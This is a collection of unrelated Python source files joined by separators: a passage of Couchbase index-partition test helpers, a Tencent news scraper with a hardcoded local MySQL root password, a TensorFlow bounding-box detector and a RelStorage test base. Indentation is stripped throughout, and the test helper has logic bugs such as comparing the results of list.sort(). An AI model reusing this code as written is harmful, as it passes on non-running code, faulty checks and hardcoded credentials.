dropped_replica_name = index_name + " (replica {0})".format(str(i))
else:
index_names.append(index_name + " (replica {0})".format(str(i)))
partition_validation_per_host = True
for host in hosts:
pmap_host = []
for idx_name in index_names:
for index in index_metadata["status"]:
if (index["name"] == idx_name) and (host in index["hosts"]):
pmap_host += index["partitionMap"][host]
self.log.info(
"List of partitions on {0} : {1}".format(host, pmap_host))
if len(set(pmap_host)) != len(pmap_host):
partition_validation_per_host &= False
self.log.info(
"Partitions on {0} for all replicas are not correct, host contains duplicate partitions".format(host))
partitions_distributed_for_index = True
for idx_name in index_names:
for index in index_metadata["status"]:
if index["name"] == idx_name:
totalPartitions = 0
for host in hosts:
if host in index["partitionMap"]:
totalPartitions += len(index["partitionMap"][host])
partitions_distributed_for_index &= (
totalPartitions == num_partitions)
if dropped_replica:
if index['name'] == dropped_replica_name:
partitions_distributed_for_index = False
return partition_validation_per_host & partitions_distributed_for_index
def validate_partition_distribution_after_cluster_ops(self, index_name,
map_before_rebalance,
map_after_rebalance,
nodes_in, nodes_out):
# Check for number of partitions before and after rebalance
# Check the host list before rebalance and after rebalance, and see if the incoming or outgoing node is added/removed from the host list
# Check for partition distribution across all indexer nodes
for index in map_before_rebalance["status"]:
if index["name"] == index_name:
host_list_before = index["hosts"]
num_partitions_before = index["numPartition"]
partition_map_before = index["partitionMap"]
for index in map_after_rebalance["status"]:
if index["name"] == index_name:
host_list_after = index["hosts"]
num_partitions_after = index["numPartition"]
partition_map_after = index["partitionMap"]
is_num_partitions_equal = False
if num_partitions_before == num_partitions_after:
is_num_partitions_equal = True
else:
self.log.info(
"Number of partitions before and after cluster operations is not equal. Some partitions missing/extra.")
self.log.info(
"Num Partitions Before : {0}, Num Partitions After : {1}".format(
num_partitions_before, num_partitions_after))
expected_host_list_after = copy.deepcopy(host_list_before)
for node in nodes_in:
node_str = node.ip + ":" + str(node.port)
expected_host_list_after.append(node_str)
for node in nodes_out:
node_str = node.ip + ":" + str(node.port)
if node_str in expected_host_list_after:
expected_host_list_after.remove(node_str)
is_node_list_correct = False
if (expected_host_list_after.sort() == host_list_after.sort()):
is_node_list_correct = True
else:
self.log.info(
"Host list for index is not expected after cluster operations.")
self.log.info("Expected Nodes : {0}, Actual nodes : {1}",
format(str(expected_host_list_after),
str(host_list_after)))
is_partitions_distributed = False
pmap_host_list = list(partition_map_after.keys())
if pmap_host_list.sort() == host_list_after.sort():
is_partitions_distributed = True
else:
self.log.info(
"Partitions not distributed correctly post cluster ops")
return is_num_partitions_equal & is_node_list_correct & is_partitions_distributed
def get_num_partitions_for_index(self, index_map, index_name):
num_partitions = 0
for index_map_item in index_map["status"]:
if index_map_item["name"] == index_name:
num_partitions = index_map_item["numPartition"]
if num_partitions == 0:
self.log.info("Index not found, or some other issue")
else:
return num_partitions
# Description : Returns a list of create index statements generated randomly for emp dataset.
# The create index statements are generated by randomizing various parts of the statements like list of
# index keys, partition keys, primary/secondary indexes, deferred index, partial index, replica index, etc.
def generate_random_create_index_statements(self, bucketname="default",
idx_node_list=None,
num_statements=1):
num_idx_nodes = len(idx_node_list)
emp_fields = {
'text': ["name", "dept", "languages_known", "email", "meta().id"],
'number': ["mutated", "salary"],
'boolean': ["is_manager"],
'datetime': ["join_date"],
'object': ["manages"] # denote nested fields
}
emp_nested_fields = {
'manages': {
'text': ["reports"],
'number': ["team_size"]
}
}
index_variations_list = ["num_partitions", "num_replica", "defer_build",
"partial_index", "primary_index", "nodes",
"sizing_estimates"]
all_emp_fields = ["name", "dept", "languages_known", "email", "mutated",
"salary", "is_manager", "join_date", "reports",
"team_size"]
partition_key_type_list = ["leading_key", "trailing_key",
"function_applied_key",
"document_id", "function_applied_doc_id"]
index_details = []
for i in range(num_statements):
random.seed()
# 1. Generate a random no. of fields to be indexed
num_index_keys = random.randint(1, len(all_emp_fields) - 1)
# 2. Generate random fields
index_fields = []
for index in range(0, num_index_keys):
index_field_list_idx = random.randint(0, len(
all_emp_fields) - 1)
if all_emp_fields[
index_field_list_idx] not in index_fields:
index_fields.append(
all_emp_fields[index_field_list_idx])
else:
# Generate a random index again
index_field_list_idx = random.randint(0,
len(
all_emp_fields) - 1)
if all_emp_fields[
index_field_list_idx] not in index_fields:
index_fields.append(
all_emp_fields[index_field_list_idx])
# 3. Generate a random no. for no. of partition keys (this should be < #1)
if num_index_keys > 1:
num_partition_keys = random.randint(1, num_index_keys - 1)
else:
num_partition_keys = num_index_keys
# 4. For each partition key, randomly select a partition key type from the list and generate a partition key with it
partition_keys = []
for index in range(num_partition_keys):
key = None
partition_key_type = partition_key_type_list[
random.randint(0, len(partition_key_type_list) - 1)]
if partition_key_type == partition_key_type_list[0]:
key = index_fields[0]
if partition_key_type == partition_key_type_list[1]:
if len(index_fields) > 1:
randval = random.randint(1, len(index_fields)-1)
key = index_fields[randval]
else:
key = index_fields[0]
if partition_key_type == partition_key_type_list[2]:
idx_key = index_fields[
random.randint(0, len(index_fields) - 1)]
if idx_key in emp_fields["text"]:
key = ("LOWER({0})".format(idx_key))
elif idx_key in emp_fields["number"]:
key = ("({0} % 10) + ({0} * 2) ").format(idx_key)
elif idx_key in emp_fields["boolean"]:
key = ("NOT {0}".format(idx_key))
elif idx_key in emp_fields["datetime"]:
key = ("DATE_ADD_STR({0},-1,'year')".format(idx_key))
elif idx_key in emp_nested_fields["manages"]["text"]:
key = ("LOWER({0})".format(idx_key))
elif idx_key in emp_nested_fields["manages"]["number"]:
key = ("({0} % 10) + ({0} * 2)").format(idx_key)
if partition_key_type == partition_key_type_list[3]:
key = "meta().id"
if partition_key_type == partition_key_type_list[4]:
key = "SUBSTR(meta().id, POSITION(meta().id, '__')+2)"
if ((key is not None) or (key != "")) and (key not in partition_keys):
partition_keys.append(key)
self.log.info("Partition Keys : {0}, Partition Key Type : {1}".format(key, partition_key_type))
# 6. Choose other variation in queries from the list.
num_index_variations = random.randint(0, len(
index_variations_list) - 1)
index_variations = []
for index in range(num_index_variations):
index_variation = index_variations_list[
random.randint(0, len(index_variations_list) - 1)]
if index_variation not in index_variations:
index_variations.append(index_variation)
# Primary indexes cannot be partial, so remove partial index if primary index is in the list
if ("primary_index" in index_variations) and (
"partial_index" in index_variations):
index_variations.remove("partial_index")
# 7. Build create index queries.
index_name = "idx" + str(random.randint(0, 1000000))
if "primary_index" in index_variations:
create_index_statement = "CREATE PRIMARY INDEX {0} on {1}".format(
index_name, bucketname)
else:
create_index_statement = "CREATE INDEX {0} on {1}(".format(
index_name, bucketname)
create_index_statement += ",".join(index_fields) + ")"
create_index_statement += " partition by hash("
create_index_statement += ",".join(partition_keys) + ")"
if "partial_index" in index_variations:
create_index_statement += " where meta().id > 10"
with_list = ["num_partitions", "num_replica", "defer_build",
"nodes", "sizing_estimates"]
num_partitions = 0
num_replica = 0
defer_build = False
nodes = []
if (any(x in index_variations for x in with_list)):
with_statement = []
create_index_statement += " with {"
if "num_partitions" in index_variations:
if self.gsi_type == "memory_optimized":
num_partitions = random.randint(4, 20)
else:
num_partitions = random.randint(4, 100)
with_statement.append(
"'num_partition':{0}".format(num_partitions))
if "num_replica" in index_variations:
# We do not want 'num_replica' and 'nodes' both in the with clause, as it can cause errors if they do not match.
if "nodes" in index_variations:
index_variations.remove("nodes")
num_replica = random.randint(1, num_idx_nodes - 1)
with_statement.append(
"'num_replica':{0}".format(num_replica))
if "defer_build" in index_variations:
defer_build = True
with_statement.append("'defer_build':true")
if "sizing_estimates" in index_variations:
with_statement.append("'secKeySize':20")
with_statement.append("'docKeySize':20")
with_statement.append("'arrSize':10")
if "nodes" in index_variations:
num_nodes = random.randint(1, num_idx_nodes - 1)
for i in range(0, num_nodes):
node = idx_node_list[
random.randint(0, num_idx_nodes - 1)]
if node not in nodes:
nodes.append(node)
node_list_str = ""
if nodes is not None and len(nodes) > 1:
node_list_str = "\"" + "\",\"".join(nodes) + "\""
else:
node_list_str = "\"" + nodes[0] + "\""
with_statement.append("'nodes':[{0}]".format(node_list_str))
create_index_statement += ",".join(with_statement) + "}"
index_detail = {}
index_detail["index_name"] = index_name
if num_partitions == 0:
num_partitions = 8
index_detail["num_partitions"] = num_partitions
index_detail["num_replica"] = num_replica
index_detail["defer_build"] = defer_build
index_detail["index_definition"] = create_index_statement
index_detail["nodes"] = nodes
if key is not None or key != "":
index_details.append(index_detail)
else:
self.log.info(
"Generated a malformed index definition. Discarding it.")
return index_details
def validate_query_plan(self, plan, index_name, num_spans=0, limit=0,
offset=0, projection_list=[], index_order_list=[]):
span_pushdown = False
limit_pushdown = False
offset_pushdown = False
projection_pushdown = False
sorting_pushdown = False
index_section_found = False
plan_index_section = {}
for plan_child in plan["~children"]:
if "index" in plan_child:
index_section_found = True
plan_index_section = plan_child
break;
for plan_child in plan["~children"]:
if not index_section_found:
for plan_child_child in plan_child["~children"]:
if "index" in plan_child_child:
index_section_found = True
plan_index_section = plan_child_child
break;
else:
break
if index_section_found:
if plan_index_section["index"] == index_name:
if num_spans > 0:
if "spans" in plan_index_section:
if len(plan_index_section["spans"][0][
"range"]) != num_spans:
self.log.info(
"Looks like all spans not pushed down to indexer. Spans pushed down to indexer = %s",
len(plan_index_section["spans"]["range"]))
else:
self.log.info(
"All spans pushed down to indexer")
span_pushdown = True
else:
self.log.info("Spans not pushed down to indexer")
if limit > 0:
if "limit" in plan_index_section:
if int(plan_index_section["limit"]) != limit:
self.log.info(
"Limit not correctly pushed down to indexer")
else:
self.log.info(
"Limit pushed down to indexer")
limit_pushdown = True
else:
self.log.info("Limit not pushed down to indexer")
if offset > 0:
if "offset" in plan_index_section:
if int(plan_index_section["offset"]) != offset:
self.log.info(
"Offset not correctly pushed down to indexer")
else:
self.log.info(
"Offset pushed down to indexer")
offset_pushdown = True
else:
self.log.info("Offset not pushed down to indexer")
if projection_list:
if "index_projection" in plan_index_section:
if plan_index_section["index_projection"][
"entry_keys"] != projection_list:
self.log.info(
"Projection not correctly pushed down to indexer")
else:
self.log.info(
"Projection pushed down to indexer")
projection_pushdown = True
if index_order_list:
if "index_order" in plan_index_section:
if plan_index_section[
"index_order"] != index_order_list:
self.log.info(
"Sorting not correctly pushed down to indexer")
else:
self.log.info(
"Sorting pushed down to indexer")
sorting_pushdown = True
return span_pushdown, limit_pushdown, offset_pushdown, projection_pushdown, sorting_pushdown
def _load_emp_dataset(self, op_type="create", expiration=0, start=0,
end=1000):
# Load Emp Dataset
self.cluster.bucket_flush(self.master)
if end > 0:
self._kv_gen = JsonDocGenerator("emp_",
encoding="utf-8",
start=start,
end=end)
gen = copy.deepcopy(self._kv_gen)
self._load_bucket(self.buckets[0], self.servers[0], gen, op_type,
expiration)
def _run_queries(self, query, count=10):
for i in range(0, count):
try:
self.n1ql_helper.run_cbq_query(query=query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
raise Exception("query failed")
self.sleep(1)
def _saturate_indexer_memory(self, index_server=None):
cnt = 0
step = 100000
docs = 100000
while cnt < 50:
if self.gsi_type == "memory_optimized":
if self._validate_indexer_status_oom(index_server):
self.log.info("OOM on index server is achieved")
return True
elif self.gsi_type == "plasma":
if self._validate_indexer_in_dgm(index_server):
self.log.info("DGM on index server is achieved")
return True
for task in self.kv_mutations(docs, start=docs - step):
task.result()
self.sleep(5)
cnt += 1
docs += step
return False
def _validate_indexer_status_oom(self, index_server=None):
if not index_server:
index_server = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=False)
rest = RestConnection(index_server)
index_stats = rest.get_indexer_stats()
self.log.info(index_stats["indexer_state"])
if index_stats["indexer_state"].lower() == "paused":
return True
else:
return False
def _validate_indexer_in_dgm(self, index_server=None):
indexer_rest = RestConnection(index_server)
content = indexer_rest.get_index_storage_stats()
for index in list(content.values()):
for stats in list(index.values()):
if stats["MainStore"]["resident_ratio"] >= 1.00:
return False
return True
def kv_mutations(self, docs=1, start=0):
self.log.info("Inside kv_mutations")
if not docs:
docs = self.docs_per_day
gens_load = self.generate_docs(docs, start=start)
self.full_docs_list = self.generate_full_docs_list(gens_load)
self.gen_results = TuqGenerators(self.log, self.full_docs_list)
tasks = self.async_load(generators_load=gens_load, op_type="create",
batch_size=1000)
return tasks
|
pa_tengxunxinwen.py
|
import re
import json
import gevent
import random
import pymysql
import requests
import threading
from queue import Queue
def conn_mysql():
conn = pymysql.connect(host='127.0.0.1',
port=3306,
user='root',
password='123456',
db='spiderwork')
cursor = conn.cursor()
return conn, cursor
def random_str():
string = 'abcdefghigklmnopqrstuvwxyz'
ret = ''
for i in range(15):
ret += random.choice(string)
return ret
def request_url(url):
agent = random_str()
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.9',
'User-Agent': agent,
}
response = requests.get(url,headers=headers)
ret = response.text
return ret
def worker(news):
news_info = {}
news_url = news['url']
news_source = news['source']
news_info['title'] = news['title']
news_info['source'] = news_source
news_info['url'] = news_url
news_ret = request_url(news_url)
pattern = re.compile(r'content: (\{.*?)id:', re.S)
news_str = pattern.findall(news_ret)[0].strip()
news_str = news_str.rsplit(',', 1)[0]
news_dict = json.loads(news_str, encoding='utf-8')
news_content = news_dict['cnt_html']
news_content = re.sub(r'\<(.*?)\>', '', news_content)
news_content = news_content.rsplit('▌', 1)[0]
news_info['content'] = news_content
news_info['release_time'] = news_dict['alt_time']
news_info['engineer'] = 'fang'
print(news_info)
if lock.acquire():
sql = "insert into tengxunew(title, source, url, release_time, content, engineer) values(%s, %s, %s, %s, %s, %s)"
news_data = (news_info['title'], news_info['source'], news_info['url'], news_info['release_time'], news_info['content'], news_info['engineer'])
conn.ping(reconnect=True)
try:
cursor.execute(sql, news_data)
conn.commit()
except Exception as err_msg:
print(err_msg)
conn.rollback()
lock.release()
data[news_source].append(news_info)
def task(q):
while not q.empty():
url = q.get()
ret = request_url(url)
ret_dict = json.loads(ret, encoding='utf-8')
if ret_dict['data']:
gevent_list = []
for news in ret_dict['data']:
g = gevent.spawn(worker, news)
gevent_list.append(g)
gevent.joinall(gevent_list)
def crawl():
q = Queue()
mid_dict = {
'央视新闻': 58,
'中国新闻网': 1124,
'中国周刊': 1156,
'央视网新闻': 5278151,
'人民网': 1456,
'新华社新闻': 10859191,
'北青Qnews': 16314728,
'环球网': 26082,
'新京报': 26134,
'观察者网': 5006122,
'第一财经': 5178949,
'北京青年报': 5081830,
'界面新闻': 5564731,
'21世纪经济报道': 1233,
'中国新闻周刊': 5069188,
'光明网': 5215397,
'正义网': 5029544,
'法制网': 5065699,
'中国证券报': 1368,
'证券时报网': 1755,
}
for key, mid in mid_dict.items():
data[key] = []
for page in range(10):
url = 'https://pacaio.match.qq.com/om/mediaArticles?mid={}&num=30&page={}'.format(mid, page)
q.put(url)
threading_list = []
for i in range(10):
t = threading.Thread(target=task, args=(q, ))
t.start()
threading_list.append(t)
for t in threading_list:
t.join()
# with open('tengxun.json', mode='w', encoding='utf-8') as fp:
# json.dump(data, fp, ensure_ascii=False, indent=4)
cursor.close()
conn.close()
if __name__ == '__main__':
data = {}
conn, cursor = conn_mysql()
lock = threading.Lock()
crawl()
|
tensorflow.py
|
# -*- coding: utf-8 -*-
try:
import tensorflow as tf
from object_detection.utils import label_map_util as lm_util
except ImportError as error:
raise ImportError(
"Usage of the TensorFlow detectors requires that TensorFlow and the TensorFlow Object "
"Detection API are installed. A quick guide on how to set these up can be found here: "
"https://tensorflow-object-detection-api-tutorial.readthedocs.io/en/latest/install.html")\
from error
import threading
import numpy as np
from copy import copy
from pathlib import Path
from .base import Detector
from ..base import Property
from ..buffered_generator import BufferedGenerator
from ..types.array import StateVector
from ..types.detection import Detection
class TensorFlowBoxObjectDetector(Detector):
"""TensorFlowBoxObjectDetector
A box object detector that generates detections of objects in the form of bounding boxes
from image/video frames using a TensorFlow object detection model. Both TensorFlow 1 and
TensorFlow 2 compatible models are supported.
The detections generated by the box detector have the form of bounding boxes that capture
the area of the frame where an object is detected. Each bounding box is represented by a
vector of the form ``[x, y, w, h]``, where ``x, y`` denote the relative coordinates of the
top-left corner, while ``w, h`` denote the relative width and height of the bounding box.
Additionally, each detection carries the following meta-data fields:
- ``raw_box``: The raw bounding box, as generated by TensorFlow.
- ``class``: A dict with keys ``id`` and ``name`` relating to the id and name of the
detection class.
- ``score``: A float in the range ``(0, 1]`` indicating the detector's confidence.
Important
---------
Use of this class requires that TensorFlow 2 and the TensorFlow Object Detection API are
installed. A quick guide on how to set these up can be found
`here <https://tensorflow-object-detection-api-tutorial.readthedocs.io/en/latest/install.html>`_.
""" # noqa
model_path: Path = Property(
doc="Path to ``saved_model`` directory. This is the directory that contains the "
"``saved_model.pb`` file.")
labels_path: Path = Property(
doc="Path to label map (``*.pbtxt`` file). This is the file that contains mapping of "
"object/class ids to meaningful names")
run_async: bool = Property(
doc="If set to ``True``, the detector will digest frames from the reader asynchronously "
"and only perform detection on the last frame digested. This is suitable when the "
"detector is applied to readers generating a live feed (e.g. "
":class:`~.FFmpegVideoStreamReader`), where real-time processing is paramount. "
"Defaults to ``False``",
default=False)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Load model
model = tf.saved_model.load(self.model_path)
tf_version = model.tensorflow_version
# Get detection function
if tf_version.startswith('1'):
self._detect_fn = model.signatures['serving_default']
else:
self._detect_fn = model
# Create category index
self.category_index = lm_util.create_category_index_from_labelmap(self.labels_path,
use_display_name=True)
# Variables used in async mode
if self.run_async:
self._buffer = None
# Initialise frame capture thread
self._capture_thread = threading.Thread(target=self._capture)
self._capture_thread.daemon = True
self._thread_lock = threading.Lock()
self._capture_thread.start()
@BufferedGenerator.generator_method
def detections_gen(self):
"""Returns a generator of detections for each frame.
Yields
------
: :class:`datetime.datetime`
Datetime of current time step
: set of :class:`~.Detection`
Detections generated in the time step. The detection state vector is of the form
``(x, y, w, h)``, where ``x, y`` denote the relative coordinates of the top-left
corner of the bounding box containing the object, while ``w, h`` denote the relative
width and height of the bounding box. Additionally, each detection carries the
following meta-data fields:
- ``raw_box``: The raw bounding box, as generated by TensorFlow.
- ``class``: A dict with keys ``id`` and ``name`` relating to the \
id and name of the detection class, as specified by the label map.
- ``score``: A float in the range ``(0, 1]`` indicating the detector's confidence
"""
if self.run_async:
yield from self._detections_gen_async()
else:
yield from self._detections_gen()
def _capture(self):
for timestamp, frame in self.sensor:
self._thread_lock.acquire()
self._buffer = frame
self._thread_lock.release()
def _detections_gen(self):
for timestamp, frame in self.sensor:
detections = self._get_detections_from_frame(frame)
yield timestamp, detections
def _detections_gen_async(self):
while self._capture_thread.is_alive():
if self._buffer is not None:
self._thread_lock.acquire()
frame = copy(self._buffer)
self._buffer = None
self._thread_lock.release()
detections = self._get_detections_from_frame(frame)
yield frame.timestamp, detections
def _get_detections_from_frame(self, frame):
# The input needs to be a tensor, convert it using `tf.convert_to_tensor`.
input_tensor = tf.convert_to_tensor(frame.pixels)
# The model expects a batch of images, so add an axis with `tf.newaxis`.
input_tensor = input_tensor[tf.newaxis, ...]
# Perform detection
output_dict = self._detect_fn(input_tensor)
# All outputs are batches tensors.
# Convert to numpy arrays, and take index [0] to remove the batch dimension.
# We're only interested in the first num_detections.
num_detections = int(output_dict.pop('num_detections'))
output_dict = {key: value[0, :num_detections].numpy()
for key, value in output_dict.items()}
# Extract classes, boxes and scores
classes = output_dict['detection_classes'].astype(np.int64) # classes should be ints.
boxes = output_dict['detection_boxes']
scores = output_dict['detection_scores']
# Form detections
detections = set()
frame_height, frame_width, _ = frame.pixels.shape
for box, class_, score in zip(boxes, classes, scores):
metadata = {
"raw_box": box,
"class": self.category_index[class_],
"score": score
}
# Transform box to be in format (x, y, w, h)
state_vector = StateVector([box[1]*frame_width,
box[0]*frame_height,
(box[3] - box[1])*frame_width,
(box[2] - box[0])*frame_height])
detection = Detection(state_vector=state_vector,
timestamp=frame.timestamp,
metadata=metadata)
detections.add(detection)
return detections
|
reltestbase.py
|
# -*- coding: utf-8; -*-
##############################################################################
#
# Copyright (c) 2008 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""A foundation for RelStorage tests"""
from __future__ import absolute_import
from __future__ import print_function
# pylint:disable=too-many-ancestors,abstract-method,too-many-public-methods,too-many-lines
# pylint:disable=too-many-statements,too-many-locals
import contextlib
import functools
import os
import random
import shutil
import tempfile
import time
import threading
import unittest
import transaction
from persistent import Persistent
from persistent.mapping import PersistentMapping
from zc.zlibstorage import ZlibStorage
import ZODB.tests.util
from ZODB.Connection import TransactionMetaData
from ZODB.DB import DB
from ZODB.FileStorage import FileStorage
from ZODB.POSException import ReadConflictError
from ZODB.POSException import ReadOnlyError
from ZODB.serialize import referencesf
from ZODB.utils import z64
from ZODB.utils import u64 as bytes8_to_int64
from ZODB.utils import p64 as int64_to_8bytes
from ZODB.tests import BasicStorage
from ZODB.tests import ConflictResolution
from ZODB.tests import MTStorage
from ZODB.tests import PackableStorage
from ZODB.tests import PersistentStorage
from ZODB.tests import ReadOnlyStorage
from ZODB.tests import StorageTestBase
from ZODB.tests import Synchronization
from ZODB.tests.StorageTestBase import zodb_pickle
from ZODB.tests.StorageTestBase import zodb_unpickle
from ZODB.tests.MinPO import MinPO
from . import fakecache
from . import util
from . import mock
from . import TestCase
from . import StorageCreatingMixin
from . import skipIfNoConcurrentWriters
from .persistentcache import PersistentCacheStorageTests
from .locking import TestLocking
from .test_zodbconvert import FSZODBConvertTests
class RelStorageTestBase(StorageCreatingMixin,
TestCase,
StorageTestBase.StorageTestBase):
base_dbname = None # Override
keep_history = None # Override
_storage_created = None
def _close(self):
# Override from StorageTestBase.
# Try to avoid creating one through our _storage property.
if '_storage' in self.__dict__:
storage = self._storage
else:
storage = self._storage_created
self._storage = None
if storage is not None:
storage.close()
storage.cleanup()
def make_storage_to_cache(self):
return self.make_storage()
def get_storage(self):
# Create a storage with default options
# if it has not been created already.
storage = self._storage_created
if storage is None:
storage = self.make_storage_to_cache()
self._storage_created = storage
return storage
def set_storage(self, storage):
self._storage_created = storage
_storage = property(
lambda self: self.get_storage(),
lambda self, nv: self.set_storage(nv)
)
def open(self, read_only=False, **kwargs):
# This is used by a few ZODB tests that close and reopen the storage.
storage = self._storage
if storage is not None:
self._storage = None
storage.close()
storage.cleanup()
self._storage = storage = self.make_storage(
read_only=read_only, zap=False, **kwargs)
return storage
class StorageClientThread(MTStorage.StorageClientThread):
# MTStorage assumes that the storage object is thread safe.
# This doesn't make any sense for an MVCC Storage like RelStorage;
# don't try to use a single instance in multiple threads.
#
# This patch makes it respect that.
def __init__(self, storage, *args, **kwargs):
storage = storage.new_instance()
super(StorageClientThread, self).__init__(storage, *args, **kwargs)
def runtest(self):
try:
super(StorageClientThread, self).runtest()
finally:
self.storage.release()
self.storage = None
class ExtStorageClientThread(StorageClientThread, MTStorage.ExtStorageClientThread):
"Same as above."
class ThreadWrapper(object):
def __init__(self, storage):
self.__storage = storage
# We can't use an RLock, which verifies that the thread that
# acquired is the one that releases; check_tid_ordering_w_commit
# deliberately spreads these actions across threads (for same reason).
self.__commit_lock = threading.Lock()
rl = self.__read_lock = threading.Lock()
self.__txn = None
def make_locked(name):
meth = getattr(storage, name)
@functools.wraps(meth)
def func(*args, **kwargs):
with rl:
return meth(*args, **kwargs)
return func
for name in (
'loadBefore',
'load',
'store',
'getTid',
'lastTransaction',
):
setattr(self, name, make_locked(name))
def __getattr__(self, name):
return getattr(self.__storage, name)
def tpc_begin(self, txn):
self.__commit_lock.acquire()
self.__read_lock.acquire()
assert not self.__txn
self.__txn = txn
self.__read_lock.release()
return self.__storage.tpc_begin(txn)
def tpc_finish(self, txn, callback=None):
self.__read_lock.acquire()
assert txn is self.__txn
try:
return self.__storage.tpc_finish(txn, callback)
finally:
self.__txn = None
self.__commit_lock.release()
self.__read_lock.release()
def tpc_abort(self, txn):
self.__read_lock.acquire()
assert txn is self.__txn, (txn, self.__txn)
try:
return self.__storage.tpc_abort(txn)
finally:
self.__txn = None
self.__commit_lock.release()
self.__read_lock.release()
class UsesThreadsOnASingleStorageMixin(object):
# These tests attempt to use threads on a single storage object.
# That doesn't make sense with MVCC, where every instance is its
# own connection and doesn't need to do any locking. This mixin makes
# those tests use a special storage that locks.
@contextlib.contextmanager
def __thread_safe_wrapper(self):
orig_storage = self._storage
wrapped = self._storage = ThreadWrapper(orig_storage)
try:
yield
finally:
if self._storage is wrapped:
self._storage = orig_storage
def __generic_wrapped_test(self, meth_name):
meth = getattr(
super(UsesThreadsOnASingleStorageMixin, self),
meth_name)
try:
with self.__thread_safe_wrapper():
meth()
finally:
self._storage.zap_all(slow=True)
def make_func(name): # pylint:disable=no-self-argument
return lambda self: self.__generic_wrapped_test(name)
for bad_test in (
'check_checkCurrentSerialInTransaction',
# This one stores a b'y' (invalid pickle) into the
# database as the root object, so if we don't get zapped
# afterwards, we can't open the database.
'check_tid_ordering_w_commit',
):
locals()[bad_test] = make_func(bad_test)
del make_func
del bad_test
class GenericRelStorageTests(
UsesThreadsOnASingleStorageMixin,
RelStorageTestBase,
PersistentCacheStorageTests,
TestLocking,
BasicStorage.BasicStorage,
PackableStorage.PackableStorage,
Synchronization.SynchronizedStorage,
ConflictResolution.ConflictResolvingStorage,
PersistentStorage.PersistentStorage,
MTStorage.MTStorage,
ReadOnlyStorage.ReadOnlyStorage,
):
def setUp(self):
# ZODB.tests.util.TestCase likes to change directories
# It tries to change back in tearDown(), but if there's an error,
# we may not get to tearDown. addCleanup() always runs, though.
# do that as the very last thing that happens (except for subclasses, they
# could add things first)
self.addCleanup(os.chdir, os.getcwd())
super(GenericRelStorageTests, self).setUp()
# PackableStorage is particularly bad about leaving things
# dangling. For example, if the ClientThread runs into
# problems, it doesn't close its connection, which can leave
# locks dangling until GC happens and break other threads and even
# other tests.
#
# Patch around that. Be sure to only close a given connection once,
# though.
_closing = self._closing
def db_factory(storage, *args, **kwargs):
db = _closing(DB(storage, *args, **kwargs))
db_open = db.open
def o(transaction_manager=None, at=None, before=None):
conn = db_open(transaction_manager=transaction_manager,
at=at,
before=before)
_closing(conn)
if transaction_manager is not None:
# If we're using an independent transaction, abort it *before*
# attempting to close the connection; that means it must be registered
# after the connection.
self.addCleanup(transaction_manager.abort)
return conn
db.open = o
return db
PackableStorage.DB = db_factory
self.addCleanup(setattr, MTStorage,
'StorageClientThread', MTStorage.StorageClientThread)
MTStorage.StorageClientThread = StorageClientThread
self.addCleanup(setattr, MTStorage,
'ExtStorageClientThread', MTStorage.ExtStorageClientThread)
MTStorage.ExtStorageClientThread = ExtStorageClientThread
def tearDown(self):
PackableStorage.DB = DB
super(GenericRelStorageTests, self).tearDown()
def _make_readonly(self):
# checkWriteMethods in ReadOnlyStorage assumes that
# the object has an undo() method, even though that's only
# required if it's IStorageUndoable, aka history-preserving.
super(GenericRelStorageTests, self)._make_readonly()
storage = self._storage
if not hasattr(storage, 'undo'):
def undo(*args, **kwargs):
raise ReadOnlyError
storage.undo = undo # pylint:disable=attribute-defined-outside-init
return storage
def checkCurrentObjectTidsRoot(self):
# Get the root object in place
db = self._closing(DB(self._storage))
conn = self._closing(db.open())
storage = conn._storage
cursor = storage._load_connection.cursor
oid_to_tid = storage._adapter.mover.current_object_tids(cursor, [0])
self.assertEqual(1, len(oid_to_tid))
self.assertIn(0, oid_to_tid)
# Ask for many, many objects that don't exist.
# Force the implementation to loop if that's what it does internally.
oid_to_tid = storage._adapter.mover.current_object_tids(cursor, range(0, 3523))
self.assertEqual(1, len(oid_to_tid))
self.assertIn(0, oid_to_tid)
# No matching oids.
oid_to_tid = storage._adapter.mover.current_object_tids(cursor, range(1, 3523))
self.assertEqual(0, len(oid_to_tid))
conn.close()
db.close()
def checkLen(self):
# Override the version from BasicStorage because we
# actually do guarantee to keep track of the counts,
# within certain limits.
# len(storage) reports the number of objects.
# check it is zero when empty
self.assertEqual(len(self._storage), 0)
# check it is correct when the storage contains two object.
# len may also be zero, for storages that do not keep track
# of this number
self._dostore(data=PersistentMapping())
self._dostore(data=PersistentMapping())
self._storage._adapter.stats.large_database_change()
self.assertEqual(len(self._storage), 2)
def checkDropAndPrepare(self):
# Under PyPy, this test either takes a very long time (PyMySQL)
# or hangs (psycopg2cffi) longer than I want to wait (10+ minutes).
# This suggests there's a lock on a particular table (the eighth table we drop)
# which in turn suggests that there are connections still open and leaked!
# Running a manual GC seems to fix it. It's hard to reproduce manually because
# it seems to depend on a particular set of tests being run.
import gc
gc.collect()
gc.collect()
self._storage._adapter.schema.drop_all()
self._storage._adapter.schema.prepare()
def checkCrossConnectionInvalidation(self):
# Verify connections see updated state at txn boundaries
db = DB(self._storage)
try:
c1 = db.open()
r1 = c1.root()
r1['myobj'] = 'yes'
c2 = db.open()
r2 = c2.root()
self.assertNotIn('myobj', r2)
storage = c1._storage
t = transaction.Transaction()
t.description = u'invalidation test'
c1.tpc_begin(t)
c1.commit(t)
storage.tpc_vote(storage._transaction)
storage.tpc_finish(storage._transaction)
self.assertNotIn('myobj', r2)
c2.sync()
self.assertIn('myobj', r2)
self.assertEqual(r2['myobj'], 'yes')
finally:
db.close()
def checkCrossConnectionIsolation(self):
# Verify MVCC isolates connections
db = DB(self._storage)
try:
c1 = db.open()
r1 = c1.root()
r1['alpha'] = PersistentMapping()
r1['gamma'] = PersistentMapping()
transaction.commit()
# Open a second connection but don't load root['alpha'] yet
